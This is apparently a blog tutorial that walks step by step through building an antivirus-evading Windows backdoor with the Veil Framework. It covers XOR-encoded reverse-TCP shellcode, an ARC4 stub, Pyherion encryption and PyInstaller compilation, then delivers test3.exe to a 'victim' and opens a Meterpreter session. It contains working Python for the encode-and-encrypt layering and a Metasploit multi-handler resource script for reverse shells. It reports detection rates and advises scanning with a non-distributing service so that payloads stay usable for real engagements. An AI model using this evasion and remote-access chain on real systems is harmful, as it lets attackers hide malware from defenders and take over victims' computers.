ANTIVIRUS EVASION / Veil Framework (IV): Evasion -> Ordnance -> ARC / Pyherion (encryption) -> XOR (encoding)
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2bg2-zFXO034Q8iYfrDI6vuB7haHLH9kfQaEk-yC9XACcilRrMRfhtx3YHvMpK4GKTloJ8svRt1p3sEoxuBDcmRdl7cXbr5LeBBbU3Bx54vpDxDQWOSDTpFBpx7_DStyc5yK1n6kitE-E/s1600/screenshot.1.jpg)
- The goal of this exercise is to achieve a reasonably good antivirus evasion rate with the Veil Framework by stacking encryption (ARC / Pyherion) on top of encoding (XOR): Ordnance generates XOR-encoded shellcode, Evasion wraps it in an ARC-encrypting Python stub, and Pyherion encrypts the resulting Python source before it is compiled to an .exe
1 - Veil-Evasion encryption with ARC and Pyherion
- Launching the program:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp256boIYMY9M8D_xugomrYCchrG4bo2ZmhTvXn1A-T3CMHwv0m2Rxhf7mZB9WNqpQEGnPskFNVVg7O2Y5bOK3zeD-MW_8Qst3i88LTyGZ1Ut-VeIYbu2tJHcbe1JhnJHhTxxIMTQXsFQ2/s400/screenshot.2.jpg)
- Listing the available tools:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1IMTE2njXTP_CyFT4v1s0VLnL3Nz0kuwsYAOITARKhTG8p0eXcriVbWiIGItMNyQ394Y3aZ5HuUs18J5L3zKTK5DSQhJnoi8g5L0U6NYdDNVG0nKo8DKVMQnDWLoerZePUjXgSMxJO31b/s1600/screenshot.3.jpg)
- At first, using Evasion:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioMQujn0Gh9ssNiccDIAGRsvAvZCXrekY2P4kCrfiAyS8ipulapH-Vi0-pRhC8OpkmISOJeZMSjmvCa0tg_PjOTZYwKeETW6LynoEWIu9SAa4QeCvvXeNqaOWp_AVoDBrtPzMX0KhCZpsc/s400/screenshot.4.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5delBMODsBv3OgUcfxigCkTv9GiUDq25JTVb93xOfvbWb1P_BxpWDpz2zJLvKZuoXMPVCSvoSgY6ZJcT6KNQ_vDeGdX_8IhyphenhyphenQT1sNOfO_zVmTSehfr9HO4rfKBTKUZJg8S_3JthTbHmQA/s1600/screenshot.5.jpg)
- Listing the available payloads, let's take number 30), which decrypts the embedded shellcode at run time with the ARC (ARC4) stream cipher:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieuSCQEjVNZk-e_nNFjOq3oGDj_M_2rW4KwLEgxzXzhRt0ZrbS0rIV-TtOF3byV2Tjsz1ErPqKmsr5UxQ7aIpGY9Gk-fPRpfWM-wnjv8_9G9gc0t2xM2eGKVAFm8REqXoCZcDALBDTpHG1/s1600/screenshot.6.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqNsCUZeehANzVxx-uFgD6c2dc9lEC1BinjnkW2bErZrk8sTBn6neoWXKRYp54VDNnCCNuDuPUG9wpyoFSoDIrK1sRMGIw1HIwfTrmiSIEx2lTQngfy4llZM1Y7UaColvGinT1VOj1EygI/s1600/screenshot.8.jpg)
- Using the payload number 30):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ86u_K-XhKsvw_J1dgC4y6YN_Qskei80u8viSexEfnq9tuN6SI4jmVZbczYbUQ9tMkZ53kKsmakd86WI3RK9P_ngwtRrh2qvh684yTrgicKO1AD0pBSCdEsn6WSOc1koCWe6hnFf7HVHG/s1600/screenshot.9.jpg)
- Setting the option USE_PYHERION (the Pyherion source-code encrypter) to Yes:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI0AnB8n3GX0gOurnBH9V1JGiXGpdaJ594LraDYd8Ei2vgfr7pEhob2bx8ODwy2FFUK5OtafItcIYQZQeDLneRj9Efg2WUaKLGk7xQVOUudrfScfsxD39HyHjB4c63LjpJAhUUu1CPZVK3/s1600/screenshot.10.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNSMEIEPE0txN7a_XlkMntiLY3QTfUYYUOfmuRJmMq6JsbPGpG52d76eJDZ75NW8LnTSJoKsS9t67Ejk3RcVlz8ZyeeeU4vSfATgfAVq_bd3_du_lfkUH9UUuZLhUaXdL-0Zr3nmQNNvK2/s1600/screenshot.11.jpg)
2 - Generating the shellcode with Ordnance and encoding with XOR
- Generating the payload:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRvMngq9TzQVAJSlf8LEJUQ1G9_p_FYsZbjEz5s_P3DPr8s6_qz8_u59utq6B8tgyABb6RhfMxippLvhWHWwVj0H-wCnSe8p1I9VSh2sYIAV7VDExWs92PPAO20hXoVwf4_4hDR6MM0mVt/s1600/screenshot.12.jpg)
- Accepting Ordnance as the default shellcode generator:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBzYUVJSz6v-1g734WEO3cT77HTeh3XoUGz99MXCLsjAAU_xtWHRDKM6mvHz9DxLWhTg003LfUEsj7M5zAev2lu7IWmM_AUqSJWUb8b46SplMrnanTmzAb6LFOYIJpSAM6mJOGR7enBztb/s1600/screenshot.13.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW0Ihqgz8x2WZqezvqfEoBFccF_V4xSwHNEQVVB_qJW7KJH8SGoR3p0uNMwOqtO6Wb9JCpeVcUPVnHdqSfTsnLzUSHnv7ftNEYiYP5QSJONcQeDS01luJM1ql8UNmh5mPcTxrSaEPPAtst/s1600/screenshot.14.jpg)
- Listing Ordnance payloads:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnwRrWLdJU3MkhQu-5cK_PljI_ul407jdZ9omxcTkMiuDr9hT3gsXMeSsaqvIEU2EpGwk0B2kElOg5lfmSdvfXu8avTcS8eHdwuXF59gW9dfMRobwQrVJx6auyY-Jla8nYGjis30ynB9lI/s1600/screenshot.15.jpg)
- Let's take rev_tcp_all_ports:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4Ay-l-IrsYsfDST3HtiDta3AtRjki4hJBh-3SzF_MXlwaFUmPmLsNCJtnCDWaL9-0EsPO8ic30SL1D4Iq3-2RRIlpGcvYk4yAdsPuM31xoCrhCposekTMyFZax-7hgBUImmw3AAa6Wq0W/s1600/screenshot.16.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjavlwWfMmHJJDbHS4TExSyt-XP2cU7ZJ9-50zdopizaREJe9OJdQeAK5M_RAXIMNFpscTV4rFeh04YdKqeSgjNQTv6u3NabCOqFl9v42l22OE6MEx7F3iPN9CdpsShFgM71NwlX02xAenV/s1600/screenshot.17.jpg)
- Options for this payload: first of all setting BadChars to \x00 (the NULL byte, which terminates C strings) and \x0A (line feed, LF, which ends a line of text input); the encoder must produce shellcode that contains neither byte:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDF-cciOcc7IwgIXF9Y7ZThhufrFNYVe-Wzbbubyoa5HsVIm7OHseiIcRRaK0fNAGR4TjJJEbStsXVV6X3cntudkR4u4kbp6y50oOHR5rs9N6QhpksR4Fq_176lWUvvwYnU5uHIeggO_3i/s1600/screenshot.18.jpg)
- Setting the encoder to XOR:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEignXXH39HGiS2GBntkiojX31FbPpmwm5rp3SfyLOdNnmzJGTojaatGw4yFXsnEI1r8S3nnHFqXh_qRKOi3RZjmCycTymx5LxICZYGkl0rKbEwNNsxOMeV1arQCqJSPKHgACauW_lAVfYpL/s1600/screenshot.19.jpg)
- Setting LHOST to Kali's IP:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigCsDNiD3rK6oVhhv1upc3hoZaUsJcSs1EV5nMXBdknexsaQtWeLA-D62fW7Jv9ZWaq2Ozp5tiCqQ8A29knZI_xYdktK06ShAMWwVxMLBo8WjpbB2m62nu75HSyVRg5wg7B0dx0X2M64-3/s1600/screenshot.20.jpg)
- Setting LPORT to Kali's listening port, 1111:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh38XMCrgtvOBI9gD1Oe-hEBT_08q5JysnfgJbkHUVQhKxbB0bgb6pFDycYptxDgAcamOABMvfZoaHWiwH9zsPb_bo9Jb7879sdIv3KHBgxOELIgPlYwHUqkdnLlJs5jdCaNgGlmnMPTWz9/s1600/screenshot.21.jpg)
- Generating the shellcode:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1vR2LzdS5S7qeApTAik6vfiGWdDh-KoSxb9hlUG0Tf49ZaykIqf0AbaitYSXlX-KxCeFz9ltRAqLVnm8Xxtsn_1na183aQ3KOW-XY10x4RliX1BaidC7oWNjU3RPjaL2kcCodukDTW5_n/s1600/screenshot.23.jpg)
- Entering the name test3:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcM3jQ_Hb0eYLimM9cclfZlRw0SZ2R2HlEgLkQ4QySF97_13DjRdRjyBDtmrEassXZ1CMgKS58MY6DZuUCWTqAfkPKEkXv3leli-KkZSmMLfUVSLdFP2PsmEThpAE6s19_-346pIx7ZyeC/s1600/screenshot.24.jpg)
- Using PyInstaller to compile the Python source into a standalone .exe file:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5svgTV1Wxlhyphenhyphen8mehEry9y1Usl2R3uerQjs3wCoiG4J3giyq3V_lmVLlCtEzttFrpCUJ_LDqJX0LWBEu7KbAPKgYrYs-NccGqbtAH560ME-k5xFJQxsGbX1FBSg5yFCT231Mt10JFyI7q4/s1600/screenshot.25.jpg)
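- To make the two transformations above concrete, here is an added example (not Veil's own code, and not the output of the steps above) that does in plain Python what Ordnance and the ARC payload do for us: it XOR-encodes a blob of shellcode while avoiding the bad characters \x00 and \x0A, then encrypts the encoded blob with an ARC4 (RC4) stream cipher under a random key, and finally shows the reverse path a generated stub walks at run time (decrypt, then XOR-decode) before injecting. The sample shellcode is a constructed stand-in for real shellcode, chosen to contain both bad bytes; the function names are this example's own:

```python
"""Added example: XOR encoding around bad characters plus ARC4 (RC4)
encryption of the encoded shellcode, and the matching run-time recovery.
This is illustrative code, not Veil's implementation."""
import os

# Bad characters chosen in the Ordnance step: NULL and line feed.
BAD_CHARS = b"\x00\x0a"

# Constructed stand-in for real shellcode: it deliberately contains both
# bad characters so the encoder has something to work around.
SAMPLE_SHELLCODE = bytes([
    0xfc, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x60, 0x89,
    0xe5, 0x31, 0xc0, 0x0a, 0x64, 0x8b, 0x50, 0x30, 0x01,
])


def count_bad(data: bytes, bad: bytes = BAD_CHARS) -> int:
    """Number of bytes in data that are in the bad-character set."""
    return sum(1 for b in data if b in bad)


def pick_xor_key(shellcode: bytes, bad: bytes = BAD_CHARS) -> int:
    """Return the smallest single-byte key such that neither the key nor any
    encoded byte is a bad character. A byte b encodes to a bad byte x exactly
    when key == b ^ x, so the search is a simple exclusion. Raises ValueError
    when no key exists (e.g. shellcode containing all 256 byte values).
    Note: a real encoder must also check its decoder stub for bad bytes."""
    for key in range(1, 256):
        if key in bad:
            continue
        if all((b ^ key) not in bad for b in shellcode):
            return key
    raise ValueError("no single-byte XOR key avoids the bad characters")


def xor_encode(data: bytes, key: int) -> bytes:
    """XOR every byte with key; the same call decodes."""
    return bytes(b ^ key for b in data)


def rc4(key: bytes, data: bytes) -> bytes:
    """ARC4/RC4 stream cipher: key scheduling (KSA) followed by the
    pseudo-random generation loop (PRGA). Encryption and decryption are the
    same operation. RC4 is used here only because it is what the ARC payload
    does; it offers obfuscation against static scanning, not confidentiality."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xff
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:                             # PRGA
        i = (i + 1) & 0xff
        j = (j + S[i]) & 0xff
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xff])
    return bytes(out)


def build_blob(shellcode: bytes, bad: bytes = BAD_CHARS) -> dict:
    """Generation side: XOR-encode around bad chars, then RC4-encrypt the
    encoded shellcode under a fresh random key. Everything in the returned
    dict would be embedded in the generated stub."""
    xor_key = pick_xor_key(shellcode, bad)
    encoded = xor_encode(shellcode, xor_key)
    rc4_key = os.urandom(16)
    return {"xor_key": xor_key, "rc4_key": rc4_key,
            "ciphertext": rc4(rc4_key, encoded)}


def recover(blob: dict) -> bytes:
    """Run-time side: decrypt, then XOR-decode, yielding the original bytes
    that the stub would go on to inject."""
    encoded = rc4(blob["rc4_key"], blob["ciphertext"])
    return xor_encode(encoded, blob["xor_key"])


if __name__ == "__main__":
    blob = build_blob(SAMPLE_SHELLCODE)
    encoded = xor_encode(SAMPLE_SHELLCODE, blob["xor_key"])
    print("bad bytes before encoding:", count_bad(SAMPLE_SHELLCODE))
    print("xor key: 0x%02x, bad bytes after encoding: %d"
          % (blob["xor_key"], count_bad(encoded)))
    print("round trip ok:", recover(blob) == SAMPLE_SHELLCODE)
```

- Two things worth noticing: the XOR key search is an exclusion over at most 255 candidates, so for shellcode that uses many distinct byte values a single-byte key can fail and a multi-byte key or a different encoder is needed; and the RC4 layer only hides the shellcode from static signature matching, since the key ships inside the stub and the plaintext reappears in memory the moment the stub runs.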
3 - Files created by Veil-Evasion
- The Veil files are created and stored in these folders:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFhfoULo1R9LsghNz-6p0gJKBm5E_sBr9vZmpU98ak-e88AGT7nN8CPfR1TVyDBxuUmE6peedbOxXyUw6GjuGQGKSa_InKgJ7FbagWc2LNXcH4exS5Gocl52YI6qd-VUzVdsGAa4clsnev/s1600/screenshot.26.jpg)
- Going to /usr/share/veil-output:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirTYpRKVMkk265DcD6SBkpgRUC-N5yADAqOJF1AIR6rZ6G0NRCbJdd68Bszd4ybL2hQmrIPRTGCmZ7y1KRMK8bv66EW_2LoEClOuBDo06nClKd8h7wNpsMvXK-N7_ZV37MV6hkxzGjuNrl/s1600/screenshot.28.jpg)
- The folders compiled, handlers and source contain the generated Veil files:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYGucz6GVmhqogi7jqcCSGjYRSHgo8arWff6VEeu2Zm7E5dPRKbeDK-o8pVsEIdJTBAPjD3qeDywD5WquvRlYh3LKBRTomvSFeZYQpQEE7brg9hykFIN4svgJEl4uoS5_PXeO84RSVE_SV/s1600/screenshot.29.jpg)
- The source file test3.py is encrypted by Pyherion, as expected: instead of the readable injection stub, the file holds an encrypted blob plus a small loader that decrypts and executes it at run time:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja1HOVrM721VGTZieyXXCpZnr5U-MtYB5QE-08S47V0SaceGRyfPI_x0pr17C-cF4ikCvqfMueoiPfXQs9QJHiEsGc7aF7MgxjniRfiT4ggflkoPp_KIiOpRB0vEjYeFN-x2eh1mPWhzdJ/s1600/screenshot.35.jpg)
4 - Transferring the .exe file to Windows 10
- The folder compiled holds the executable test3.exe, to be transferred to the Windows 10 victim:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoFROFEdoeRsPB4vb85qw2fge0inxKO_SSbd_7o1V-PT2xnPiqjFvxkmC4EnemFNAakT4uoldxhy9DqHoI7m1bRUFx0JhgA4OjKSfdFnWo8oqc9qA9hOIrgHpdCR7YbVheAyE9nDbWpXPG/s1600/screenshot.36.jpg)
- Starting a simple HTTP server on Kali to serve the file:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj39eA8qItLJL41wuXWADwdo7m4RwePGyvtsBfYkcYforZA6MBqq18PZ4ekZYiVfVFEbYZeWEMgIpzyDb1_i5NQRh3yxzk5XoGdSq34YJH7lx2EhlF1PWic6XrrqwR_UChogS5CWItmGJAW/s1600/screenshot.39.jpg)
- Downloading the executable test3.exe to Windows 10:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-W5g1otrYp_U3WbqgC3cNMFcWGAXzkDHYSLvceKb-UtDhyphenhyphenWq1U2xJdF0iJSFopp-2S2HQOk1zhtOQZYD9kj2jfKDWbUbol1dEHDSZoWcPWDd_qA-p6uNNXloZdQNvMxwT4JxUF6JBzRfe/s1600/screenshot.40.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvn2w2H0cYFoNEXCl2mHt9F6kEtkhpTQ1BgBI6BwC_MRONARC1uuvfX7ad9oNw9_jbm7yIG_u8ur-UpvC2dHMMMBv8QB9uwnpwNqV6qXIzFkPVH9afdLACTG3_lkXEX8oyksl3Yw3Hsrtq/s1600/screenshot.41.jpg)
5 - Getting a Meterpreter session with Metasploit processing the .rc resource file
- The folder handlers holds the file test3.rc, a Metasploit resource script that sets up the matching handler and can be loaded directly with msfconsole -r test3.rc:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJtzzcMtVazo_y67zH1Ski2TW6yeuphV151WNeX8oYhz7ArmoSw0tIygJteIVAuHJGXeNrkVGyGYqvdpuDvRuR6FnL1DnFaJMD4LwBXIGEQKcLPaIqrjA7fa9tXJ7sJg6zYqvA27WI9SSS/s1600/screenshot.42.jpg)
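- For reference, this is what a handler resource script equivalent to test3.rc looks like (an added example written by hand for this page, not the file Veil generated; the LHOST value is a placeholder for Kali's IP, and the payload name is the Metasploit module that corresponds to Ordnance's rev_tcp_all_ports). The handler must match what Ordnance produced, otherwise the callback arrives but the staging fails:

```text
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp_allports
set LHOST 192.168.1.10
set LPORT 1111
set ExitOnSession false
exploit -j
```

- ExitOnSession false and exploit -j keep the handler running as a background job, so the console stays usable and several victims can call back to the same listener.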
- Processing test3.rc from msfconsole:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg39c2q7sStK2ig_tBrLSiRDbRcaqEwd1w5n1h8pI6j-VZnlOVwxK-4QLFWBoJTAR9ouXhgswr0ExI_u-h8KOGS-OxlBPYnxkQ7rS1giyOj4NiQsF04VwuLnjmOCmEIaqQeBT3615LkLUca/s1600/screenshot.43.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8XdzyHv8qzh8zgLhDc_iZgzTqRGAX9ZG26u1qgfBb7-lPOcsE17FpF1ney8Ke4m5ISDSuUWcEhDDKqWf6fUOBiZACJhqfVdRKcVySEgy7vmeCOWVDBy5sXGzjTIenmrACFV_hg1thEbVr/s1600/screenshot.44.jpg)
- Executing test3.exe in Windows 10:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3TlPxYgUkpEN-aA875Oox7_pd7w6jwj4yrLR7KEMkcTg9x5Ka-K2nCUw8C3DRbq2kbGF7jKOcJZ9UMyi3x2aYP8NaDdY4J_j4jP27vGHyp11rTz6lw3uctiWJZJtlzHNzEZgZbrtUjwUB/s400/screenshot.48.jpg)
- A Meterpreter session is successfully created:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK6mUy3PuOCMBhVy5lLbz4IMXpFPX5Svf5a_O1bfU-jcuaMIDg0DzbHVQYU-vyVAKcG8R4nk-18WES8-Dtp-fKLXdYIrxwW25MDxCybLcKyUXdoGMECE5RFMftiQ1aUTZPLbsyhNSWB2Mm/s1600/screenshot.50.jpg)
6 - Checking the Anti Virus evasion rate
- Checking test3.exe against VirusTotal, an evasion rate of 56% is achieved. Note that VirusTotal shares uploaded samples with the antivirus vendors, so a payload submitted there should be considered burned for any real engagement; it is used here only to measure the result of the exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEa8jl4FWx6jXnNfggQ0ft9y45hLkbxSzkqcf4yQ4RUsI23tYq0eq2Nk7SFGeEj-OqxooTnZdliD8N3rKsR4S1Hw4_s-tXmdvi4xjrPTUVof8Z7gX9wmjplz8KUhqVwEpqBdCzR9omnmup/s1600/screenshot.46.jpg)
- Checking test3.exe against NoDistribute, a scanner that does not forward samples to vendors, an evasion rate of 58.8% is achieved:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIw_o3JBgAFM-CUVJODQ3LmYtBXcX8Oa-QLb9qrCme_m2zhzt7bMlLT8LiDiHSiHt_ZbmBto7WFBgZLV4cTD_DsbjzghAVaKk6StT7UgmqU5dm_msAVrQq3KKlMqlLPSYsvMryMkPx86bv/s1600/screenshot.47.jpg)